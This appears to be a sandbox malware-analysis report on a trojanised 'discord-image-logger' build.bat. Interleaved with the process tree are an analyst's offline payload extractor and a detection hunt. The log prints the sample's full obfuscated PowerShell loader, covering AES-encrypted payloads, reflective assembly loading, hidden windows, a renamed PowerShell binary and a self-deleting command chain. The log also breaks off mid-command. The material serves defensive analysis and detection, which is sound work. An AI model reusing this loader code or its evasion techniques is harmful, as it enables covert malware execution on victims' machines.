[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('McBhlHe8GfiHzcJuHtKawA==');$NUNZn2 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn2, 0, $NUNZn2.Length);$NUNZn2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn2);$NUNZn3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iUE4hGy8AZeVxL9AvErB6A==');$NUNZn3 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn3, 0, $NUNZn3.Length);$NUNZn3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn3);$MSWRP.Dispose();$VbRCn1.Dispose();if (@(get-process -ea silentlycontinue $NUNZn3).count -gt 1) {exit};$Stjgn = 
[Microsoft.Win32.Registry]::$cmXWw.$ZYOXs($NUNZn).$igAgV($cBXxm);$hQsbc=[string[]]$Stjgn.Split('\');$YNdMX=SPSlI(PprBf([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[1])));aBEzg $YNdMX (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NbCPC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[0]);$VbRCn = New-Object System.Security.Cryptography.AesManaged;$VbRCn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$nMOmr = $VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')();$NbCPC = $nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NbCPC, 0, $NbCPC.Length);$nMOmr.Dispose();$VbRCn.Dispose();$qrnaZ = New-Object System.IO.MemoryStream(, $NbCPC);$RJeXu = New-Object System.IO.MemoryStream;$eBeQA = New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::$NUNZn1);$eBeQA.$qpchR($RJeXu);$eBeQA.Dispose();$qrnaZ.Dispose();$RJeXu.Dispose();$NbCPC = $RJeXu.ToArray();$dlxUL = $YQTnf | IEX;$oxAUi = $dlxUL::$NUNZn2($NbCPC);$qVnjt = $oxAUi.EntryPoint;$qVnjt.$NUNZn0($null, (, [string[]] ($GlTUf)))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2396 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2396).WaitForExit();[System.Threading.Thread]::Sleep(5000); function PprBf($RmAux){ $VbRCn=[System.Security.Cryptography.Aes]::Create(); $VbRCn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VbRCn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VbRCn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU='); $VbRCn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ=='); $nMOmr=$VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')(); $WZWky=$nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmAux, 0, $RmAux.Length); $nMOmr.Dispose(); $VbRCn.Dispose(); $WZWky;}function SPSlI($RmAux){ $qrnaZ=New-Object System.IO.MemoryStream(,$RmAux); $RJeXu=New-Object System.IO.MemoryStream; $eBeQA=New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::Decompress); $eBeQA.CopyTo($RJeXu); $eBeQA.Dispose(); $qrnaZ.Dispose(); $RJeXu.Dispose(); $RJeXu.ToArray();}function aBEzg($RmAux,$ZKJrf){ $oxAUi=[System.Reflection.Assembly]::Load([byte[]]$RmAux); $qVnjt=$oxAUi.EntryPoint; $qVnjt.Invoke($null, $ZKJrf);}$VbRCn1 = New-Object System.Security.Cryptography.AesManaged;$VbRCn1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$MSWRP = $VbRCn1.('rotpyrceDetaerC'[-1..-15] -join '')();$NUNZn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iZ8jPKmNkFdL1A6USwSGLA==');$NUNZn = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn, 0, $NUNZn.Length);$NUNZn = 
[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn);$cBXxm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('302eS2iAhetJuvIY9pVgKOFxBony5LGiLQi+lPOo9Ig=');$cBXxm = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cBXxm, 0, $cBXxm.Length);$cBXxm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cBXxm);$GlTUf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2/VItTApDmqYld7UNbITmw==');$GlTUf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GlTUf, 0, $GlTUf.Length);$GlTUf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GlTUf);$YQTnf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y7u8mHn+uE8DouxrXvlfhI8HvaFVabiSu9wW1NQnVBW3d+pbXbyeWiMzHsShgQVzWTccLy3R/sL1Fgo2ngbj1Xyhdd8QHKlT7xJYowF1jSmMT/YNyn61oZ4EBOdIILtHY76iwoY89T/0NXOlbVQSqG6f76Tvu+/ljtRIjK68ygJujUjyjF9W1UFNXnjlbvKaQ0BTSj7AUpwYBspcSQUSWqlV4JZYmfkLzrzzafMFwHzW6zgfk8rU5wxN2vDnC7yji58n7rylZaggz4+okuyhoMrfM4k/T/mqHJ8VdUFO8xpIeX3hePuaZ5Z58y1CyCEoFhGVyjfm3AnZl3fgFnvsWSS15RXMq5KXGV3I38NkazdqvV05jjZTTECaOwsRwu2zLdJ29XVcSC4yPm3wAT5LZe+YH34hMw11+Tv5n+xxqwY=');$YQTnf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YQTnf, 0, $YQTnf.Length);$YQTnf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YQTnf);$CPWdf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vGf9ES1PdsfKW8Swn9bI3w==');$CPWdf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CPWdf, 0, $CPWdf.Length);$CPWdf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CPWdf);$igAgV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3UiHcuo7jcw/WkburfrLBQ==');$igAgV = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igAgV, 0, $igAgV.Length);$igAgV = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igAgV);$ZYOXs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hDpsuPmELCzhYTCugvhrpA==');$ZYOXs = 
$MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZYOXs, 0, $ZYOXs.Length);$ZYOXs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZYOXs);$cmXWw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Duasd/EcBtQj2cZsgiwg+Q==');$cmXWw = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cmXWw, 0, $cmXWw.Length);$cmXWw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cmXWw);$qpchR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KDa4G8PrmTjfH/8cqC5WDg==');$qpchR = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qpchR, 0, $qpchR.Length);$qpchR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qpchR);$NUNZn0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkNHx2c/PIn2isifrSOkpw==');$NUNZn0 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn0, 0, $NUNZn0.Length);$NUNZn0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn0);$NUNZn1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QCQIFS3Mnpd27lKyoiLRsA==');$NUNZn1 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn1, 0, $NUNZn1.Length);$NUNZn1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn1);$NUNZn2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('McBhlHe8GfiHzcJuHtKawA==');$NUNZn2 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn2, 0, $NUNZn2.Length);$NUNZn2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn2);$NUNZn3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iUE4hGy8AZeVxL9AvErB6A==');$NUNZn3 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn3, 0, $NUNZn3.Length);$NUNZn3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn3);$MSWRP.Dispose();$VbRCn1.Dispose();if (@(get-process -ea silentlycontinue $NUNZn3).count -gt 1) {exit};$Stjgn = 
[Microsoft.Win32.Registry]::$cmXWw.$ZYOXs($NUNZn).$igAgV($cBXxm);$hQsbc=[string[]]$Stjgn.Split('\');$YNdMX=SPSlI(PprBf([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[1])));aBEzg $YNdMX (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NbCPC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[0]);$VbRCn = New-Object System.Security.Cryptography.AesManaged;$VbRCn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$nMOmr = $VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')();$NbCPC = $nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NbCPC, 0, $NbCPC.Length);$nMOmr.Dispose();$VbRCn.Dispose();$qrnaZ = New-Object System.IO.MemoryStream(, $NbCPC);$RJeXu = New-Object System.IO.MemoryStream;$eBeQA = New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::$NUNZn1);$eBeQA.$qpchR($RJeXu);$eBeQA.Dispose();$qrnaZ.Dispose();$RJeXu.Dispose();$NbCPC = $RJeXu.ToArray();$dlxUL = $YQTnf | IEX;$oxAUi = $dlxUL::$NUNZn2($NbCPC);$qVnjt = $oxAUi.EntryPoint;$qVnjt.$NUNZn0($null, (, [string[]] ($GlTUf)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3832
-
-
-
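The two PowerShell stages above (build.bat.exe at PID 700, then the dropped C:\Windows\$sxr-powershell.exe at PID 2396) share one decode chain: .NET member names are stored reversed and rebuilt with `'...'[-1..-N] -join ''`, each blob is Base64, then AES-256-CBC with PKCS7 padding under a key and IV embedded in the command line, then gzip, and the result is handed to `Assembly.Load` and `EntryPoint.Invoke`. Stage 1 reads its own build.bat and takes the first line starting with `:: ` (a batch comment, so cmd.exe ignores it); stage 2 reads a `blob0\blob1` string from a registry value whose hive, subkey and value name are themselves AES-encrypted literals in its command line. The following is an added example for analysts, not the sample's code and not part of the Triage report: it reproduces the decryption so the assemblies can be pulled out for static analysis, and deliberately never loads or invokes them. The key/IV strings and the Base64 literals are copied from the command lines shown above; the file paths are placeholders, and the reading of the registry call as hive / subkey / value name is inferred from the shape `[Registry]::X.Y(a).Z(b)` rather than from decrypted output.

```powershell
# Added example (not from the sample or the Triage report): offline extractor for the
# loader chain captured in the process tree. Reproduces reversed-name -> base64 ->
# AES-256-CBC/PKCS7 -> gzip, writes the results to disk, never calls Assembly.Load.
# Run inside an isolated analysis VM against a copy of build.bat.

# Key and IV literals copied from the two command lines above.
$Stage1Key = 'v8ehdS6ppW71xL6mDjAeXsyQHYKmv0CPtd6Kn4aXzt4='   # build.bat.exe stage
$Stage1IV  = 'hx3HwApb8t08fxY/Go7cSw=='
$Stage2Key = 'gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU='   # $sxr-powershell.exe stage
$Stage2IV  = 'Nom1msioM+0T3KH2R6vuXQ=='

function ConvertFrom-ReversedName {
    # 'gnirtS46esaBmorF'[-1..-16] -join ''  is how the loader spells FromBase64String.
    param([Parameter(Mandatory)][string]$Reversed)
    $chars = $Reversed.ToCharArray()
    [array]::Reverse($chars)
    -join $chars
}

function Unprotect-LoaderBlob {
    # base64 -> AES-CBC/PKCS7 decrypt -> (unless -NoGzip) gzip inflate. Returns byte[].
    param(
        [Parameter(Mandatory)][string]$Base64,
        [Parameter(Mandatory)][string]$KeyB64,
        [Parameter(Mandatory)][string]$IvB64,
        [switch]$NoGzip
    )
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = [Convert]::FromBase64String($KeyB64)
    $aes.IV      = [Convert]::FromBase64String($IvB64)
    $dec = $aes.CreateDecryptor()
    try {
        $cipher = [Convert]::FromBase64String($Base64)
        $plain  = $dec.TransformFinalBlock($cipher, 0, $cipher.Length)
    } finally { $dec.Dispose(); $aes.Dispose() }
    if ($NoGzip) { return ,$plain }

    $in  = New-Object System.IO.MemoryStream(,$plain)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [System.IO.Compression.CompressionMode]::Decompress)
    try { $gz.CopyTo($out) } finally { $gz.Dispose(); $in.Dispose() }
    $bytes = $out.ToArray(); $out.Dispose()
    return ,$bytes   # leading comma keeps the byte[] from being unrolled by the pipeline
}

function Save-Payloads {
    # Decrypts each blob to $OutDir and reports size, an 'MZ' header check and SHA-256.
    param([string[]]$Blobs, [string]$KeyB64, [string]$IvB64, [string]$OutDir, [string]$Prefix)
    New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
    for ($i = 0; $i -lt $Blobs.Count; $i++) {
        [byte[]]$bytes = Unprotect-LoaderBlob -Base64 $Blobs[$i] -KeyB64 $KeyB64 -IvB64 $IvB64
        $path = Join-Path $OutDir ('{0}_{1}.bin' -f $Prefix, $i)
        [System.IO.File]::WriteAllBytes($path, $bytes)
        [pscustomobject]@{
            Index       = $i
            Path        = $path
            Bytes       = $bytes.Length
            LooksLikePE = ($bytes.Length -gt 2 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A)
            SHA256      = (Get-FileHash -Algorithm SHA256 -Path $path).Hash
        }
    }
}

function Export-Stage1Payloads {
    # Stage 1: first ':: ' line of build.bat, split on '\' into two blobs.
    # The loader invokes blob 1 before blob 0.
    param([Parameter(Mandatory)][string]$BatPath, [string]$OutDir = '.\extracted')
    $marker = [System.IO.File]::ReadAllLines($BatPath) | Where-Object { $_.StartsWith(':: ') } | Select-Object -First 1
    if (-not $marker) { throw "no ':: ' payload line in $BatPath" }
    Save-Payloads -Blobs $marker.Substring(3).Split('\') -KeyB64 $Stage1Key -IvB64 $Stage1IV -OutDir $OutDir -Prefix 'stage1'
}

function Export-Stage2Payloads {
    # Stage 2: same 'blob0\blob1' layout, but read from a registry value on the infected
    # host. Pass the value's string content (e.g. from an offline hive).
    param([Parameter(Mandatory)][string]$RegistryValue, [string]$OutDir = '.\extracted')
    Save-Payloads -Blobs $RegistryValue.Split('\') -KeyB64 $Stage2Key -IvB64 $Stage2IV -OutDir $OutDir -Prefix 'stage2'
}

function ConvertFrom-Stage2Literal {
    # Stage 2 decrypts its configuration strings with the same key/IV, no gzip, as UTF-8.
    param([Parameter(Mandatory)][string[]]$Base64Literals)
    foreach ($lit in $Base64Literals) {
        [byte[]]$b = Unprotect-LoaderBlob -Base64 $lit -KeyB64 $Stage2Key -IvB64 $Stage2IV -NoGzip
        [pscustomobject]@{ Literal = $lit; Plaintext = [System.Text.Encoding]::UTF8.GetString($b) }
    }
}

# Usage (paths are placeholders for this example):
ConvertFrom-ReversedName 'gnirtS46esaBmorF'       # FromBase64String
ConvertFrom-ReversedName 'kcolBlaniFmrofsnarT'     # TransformFinalBlock
Export-Stage1Payloads -BatPath 'C:\analysis\build.bat' -OutDir 'C:\analysis\extracted'
# Literals used in the registry call and the single-instance check of the stage-2 command line:
ConvertFrom-Stage2Literal @('Duasd/EcBtQj2cZsgiwg+Q==', 'hDpsuPmELCzhYTCugvhrpA==', 'iZ8jPKmNkFdL1A6USwSGLA==',
                            '3UiHcuo7jcw/WkburfrLBQ==', '302eS2iAhetJuvIY9pVgKOFxBony5LGiLQi+lPOo9Ig=', 'iUE4hGy8AZeVxL9AvErB6A==')
```

Two practical notes. First, check `LooksLikePE` before handing an output file to a .NET decompiler; a wrong key or a hand-edited build.bat yields padding errors or non-PE bytes, not a silent failure. Second, stage 2's payload is not recoverable from build.bat alone: the stage-1 assembly plants it in the registry, so on a live case collect the hive and use `Export-Stage2Payloads` on the value that `ConvertFrom-Stage2Literal` names.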
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat.exe" & ATTRIB -h -s "C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat.exe" & del /f "C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat.exe"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1924 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:4988
-
-
C:\Windows\system32\PING.EXEPING localhost -n 85⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6056
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat.exe"5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5672
-
-
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat.exe"5⤵
- Views/modifies file attributes
PID:5312
-
-
-
-
-
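The first execution chain above shows the behaviours a detection engineer would key on: a copy of PowerShell running under another name (build.bat.exe in Downloads, then $sxr-powershell.exe dropped into C:\Windows), `-ep bypass` combined with `-windowstyle hidden`, reversed member names rebuilt with `-join ''`, `[System.Reflection.Assembly]::Load` over a byte array, a second instance that calls `GetProcessById(2396).WaitForExit()` before re-running the loader, and a `PING localhost -n 8 >NUL & taskkill /F ... & ATTRIB -h -s ... & del /f ...` chain that deletes the original binary. As an added example, not part of the Triage report, the following PowerShell hunt scores process-creation records against exactly those indicators. The records are assumed to carry Sysmon Event ID 1 style fields (ProcessId, Image, OriginalFileName, ParentImage, CommandLine); the sample records are constructed for the example, with command lines trimmed from the ones captured above, and the `OriginalFileName = 'PowerShell.EXE'` values are an assumption consistent with the arguments those images accept rather than something the report states.

```powershell
# Added example (not part of the Triage report): hunt over process-creation telemetry
# for the loader tradecraft visible in this process tree. Field names follow Sysmon
# Event ID 1; sample records below are constructed for the example.

$LoaderIndicators = @(
    @{ Name = 'PowerShell image renamed or copied (OriginalFileName mismatch)'
       Test = { param($r) $r.OriginalFileName -eq 'PowerShell.EXE' -and $r.Image -notmatch '(?i)\\powershell\.exe$' } }
    @{ Name = 'ExecutionPolicy bypass with hidden window'
       Test = { param($r) $r.CommandLine -match '(?i)-(ep|executionpolicy)\s+bypass' -and $r.CommandLine -match '(?i)-windowstyle\s+hidden' } }
    @{ Name = 'Reversed member-name obfuscation (''...''[-1..-N] -join '''')'
       Test = { param($r) $r.CommandLine -match "'[^']{4,}'\[-1\.\.-\d+\]\s*-join\s*''" } }
    @{ Name = 'Reflective assembly load from a byte array'
       Test = { param($r) $r.CommandLine -match '(?i)\[System\.Reflection\.Assembly\]::.{0,40}\[byte\[\]\]' } }
    @{ Name = 'Watchdog: waits on a sibling PID before re-running'
       Test = { param($r) $r.CommandLine -match '(?i)GetProcessById\(\d+\)\.WaitForExit\(\)' } }
    @{ Name = 'Self-delete chain: ping delay, taskkill, del'
       Test = { param($r) $r.CommandLine -match '(?i)ping\s+localhost\s+-n\s+\d+.*taskkill\s+/F.*\bdel\s+/f' } }
    @{ Name = 'Executable with $sxr- prefix in the Windows root'
       Test = { param($r) $r.Image -match '(?i)^[a-z]:\\Windows\\\$sxr-[^\\]+\.exe$' } }
)

function Find-LoaderActivity {
    # Returns one row per record that trips at least one indicator, highest score first.
    param([Parameter(Mandatory)][object[]]$Records)
    foreach ($r in $Records) {
        $hits = @(foreach ($ind in $LoaderIndicators) { if (& $ind.Test $r) { $ind.Name } })
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                ProcessId   = $r.ProcessId
                Image       = $r.Image
                ParentImage = $r.ParentImage
                Score       = $hits.Count
                Indicators  = ($hits -join '; ')
            }
        }
    }
}

# Constructed sample records; command lines are trimmed copies of those in the tree above.
$dl = 'C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release'
$SampleRecords = @(
    [pscustomobject]@{ ProcessId = 700;  Image = "$dl\build.bat.exe"; OriginalFileName = 'PowerShell.EXE'; ParentImage = 'C:\Windows\system32\cmd.exe'
        CommandLine = '"build.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function iwkhR($DITIA){ $XVnki.Key=[System.Convert]::(''gnirtS46esaBmorF''[-1..-16] -join '''')(''v8ehdS6ppW71xL6mDjAeXsyQHYKmv0CPtd6Kn4aXzt4=''); } function ZkZVP($DITIA,$AoxAJ){ $HLgZK=[System.Reflection.Assembly]::(''daoL''[-1..-4] -join '''')([byte[]]$DITIA); $UXpIZ=$HLgZK.EntryPoint; $UXpIZ.Invoke($null, $AoxAJ);}' }
    [pscustomobject]@{ ProcessId = 2396; Image = 'C:\Windows\$sxr-powershell.exe'; OriginalFileName = 'PowerShell.EXE'; ParentImage = "$dl\build.bat.exe"
        CommandLine = '"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function aBEzg($RmAux,$ZKJrf){ $oxAUi=[System.Reflection.Assembly]::Load([byte[]]$RmAux); $qVnjt=$oxAUi.EntryPoint; $qVnjt.Invoke($null, $ZKJrf);}' }
    [pscustomobject]@{ ProcessId = 3832; Image = 'C:\Windows\$sxr-powershell.exe'; OriginalFileName = 'PowerShell.EXE'; ParentImage = 'C:\Windows\$sxr-powershell.exe'
        CommandLine = '"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2396).WaitForExit();[System.Threading.Thread]::Sleep(5000); function PprBf($RmAux){ $VbRCn=[System.Security.Cryptography.Aes]::Create() }' }
    [pscustomobject]@{ ProcessId = 1924; Image = 'C:\Windows\System32\cmd.exe'; OriginalFileName = 'Cmd.Exe'; ParentImage = "$dl\build.bat.exe"
        CommandLine = "`"C:\Windows\System32\cmd.exe`" /C PING localhost -n 8 >NUL & taskkill /F /IM `"$dl\build.bat.exe`" & ATTRIB -h -s `"$dl\build.bat.exe`" & del /f `"$dl\build.bat.exe`"" }
    [pscustomobject]@{ ProcessId = 4242; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; OriginalFileName = 'PowerShell.EXE'; ParentImage = 'C:\Windows\explorer.exe'
        CommandLine = '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command Get-Date' }   # benign control, scores 0
)

Find-LoaderActivity -Records $SampleRecords | Sort-Object Score -Descending | Format-Table -AutoSize -Wrap
```

Against the constructed records the two loader processes score four indicators each, the watchdog instance four (renamed image, bypass plus hidden, the `WaitForExit` pattern and the `$sxr-` path), the cmd.exe self-delete chain one, and the benign powershell.exe none. The OriginalFileName check is the most durable of the set, because it survives any rename of the dropped binary; the string-pattern checks are cheap to evade and are better treated as corroboration than as standalone alerts.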
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat"2⤵
- Drops file in Windows directory
PID:3932 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of FindShellTrayWindow
PID:5392
-
-
C:\Windows\system32\net.exenet session3⤵PID:5348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:2092
-
-
-
C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat.exe"build.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function iwkhR($DITIA){ $XVnki=[System.Security.Cryptography.Aes]::Create(); $XVnki.Mode=[System.Security.Cryptography.CipherMode]::CBC; $XVnki.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $XVnki.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8ehdS6ppW71xL6mDjAeXsyQHYKmv0CPtd6Kn4aXzt4='); $XVnki.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hx3HwApb8t08fxY/Go7cSw=='); $LrZFK=$XVnki.CreateDecryptor(); $return_var=$LrZFK.TransformFinalBlock($DITIA, 0, $DITIA.Length); $LrZFK.Dispose(); $XVnki.Dispose(); $return_var;}function kOuIB($DITIA){ $DbpkU=New-Object System.IO.MemoryStream(,$DITIA); $qZtjl=New-Object System.IO.MemoryStream; $JMgSB=New-Object System.IO.Compression.GZipStream($DbpkU, [IO.Compression.CompressionMode]::Decompress); $JMgSB.CopyTo($qZtjl); $JMgSB.Dispose(); $DbpkU.Dispose(); $qZtjl.Dispose(); $qZtjl.ToArray();}function ZkZVP($DITIA,$AoxAJ){ $HLgZK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$DITIA); $UXpIZ=$HLgZK.EntryPoint; $UXpIZ.Invoke($null, $AoxAJ);}$zVdRm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat').Split([Environment]::NewLine);foreach ($BYfmw in $zVdRm) { if ($BYfmw.StartsWith(':: ')) { $Rndkm=$BYfmw.Substring(3); break; }}$FMGlq=[string[]]$Rndkm.Split('\');$IgKIL=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[0])));$voFjb=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[1])));ZkZVP $voFjb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));ZkZVP $IgKIL (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 